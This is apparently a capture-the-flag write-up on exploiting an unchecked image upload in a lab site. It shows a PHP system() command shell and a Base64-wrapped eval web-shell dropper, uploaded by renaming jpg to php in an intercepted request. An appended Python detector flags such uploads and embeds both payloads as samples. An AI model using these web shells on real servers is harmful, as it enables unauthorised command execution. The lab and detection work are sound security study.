1. Challenge
Open the challenge:
This is a website with Spring Cloud Environment: CVE-2022-28060; it seems there should be multiple vulnerabilities.
Click admin; no login is needed.
Users -> add users
Select the file here. It has to be in jpg format; in php format the one-line web shell will not be able to run.
2. Uploading a command-execution web shell
Uploading an ordinary one-line web shell does not give access to the flag on this range:
Only the code other than the one-line web shell is shown.
Construct a web shell that calls system():
<?php system($_GET[1]);phpinfo();?>
Capture the request.
Send the request.
In the request, change jpg to php.
View http://xxx.ichunqiu.com/img/xxx.php?1=cat%20/flag
flag{f1cc8a36-a3cf-40b6-8a89-84bd365354ee}
3. Connecting with AntSword
One-line web shells are blocked, so we need to use PHP and Base64 to construct a special shell for the connection:
First Base64-encode the one-line web shell <?php @eval($_POST['wjsc']);?>
The file to upload is as follows:
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3anNjJ10pOz8+'));
?>
Capture the request in Burp, send it to Repeater, and change jpg to php:
The shell.php file is generated; the web shell was carried in Base64 form.
Connect with AntSword:
View the flag in the root directory:
flag{70d851f7-4cbc-4604-86f7-555f2031f81f}
The range session had expired, so the flag is different; it is regenerated for every session.
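From the defender's side, both uploads above can be caught at the moment the file is stored. The following is an added example, not part of the original write-up or of the vulnerable application: it checks the stored name and content of an upload, and also decodes quoted Base64 literals so the wrapped shell from section 3 is seen too. The function names, finding labels and the allow-list are assumptions made for this sketch.

```python
import base64
import re

# Allowed image extensions and the magic bytes their content must start with.
IMAGE_MAGIC = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)
# Request-controlled input passed straight to a code or command execution call.
SINK = re.compile(rb"\b(eval|assert|system|exec|shell_exec|passthru)\s*\(\s*"
                  rb"\$_(GET|POST|REQUEST|COOKIE)", re.I)
B64_LITERAL = re.compile(rb"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decoded_layers(data, depth=3):
    """Yield data, then the decoding of each quoted Base64 literal, recursively."""
    yield data
    if depth == 0:
        return
    for match in B64_LITERAL.finditer(data):
        try:
            inner = base64.b64decode(match.group(1), validate=True)
        except ValueError:  # not valid Base64 after all
            continue
        yield from decoded_layers(inner, depth - 1)


def inspect_upload(stored_name, data):
    """Return sorted finding labels for a file as it will be stored on disk."""
    findings = set()
    dot = stored_name.rfind(".")
    magic = IMAGE_MAGIC.get(stored_name[dot:].lower()) if dot != -1 else None
    if magic is None:
        findings.add("extension-not-allowed")
    elif not data.startswith(magic):
        findings.add("magic-mismatch")
    for i, layer in enumerate(decoded_layers(data)):
        suffix = "-in-base64" if i else ""
        if PHP_TAG.search(layer):
            findings.add("php-tag" + suffix)
        if SINK.search(layer):
            findings.add("exec-sink" + suffix)
    return sorted(findings)


# The two payloads from this page, plus a constructed JPEG header as a clean file.
CMD_SHELL = b"<?php system($_GET[1]);phpinfo();?>"
DROPPER = (b"<?php\nfile_put_contents('shell.php',base64_decode("
           b"'PD9waHAgQGV2YWwoJF9QT1NUWyd3anNjJ10pOz8+'));\n?>")
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 32
```

The check has to run on the name the server will actually write, after the request has been parsed, because the jpg-to-php change is made in the request itself.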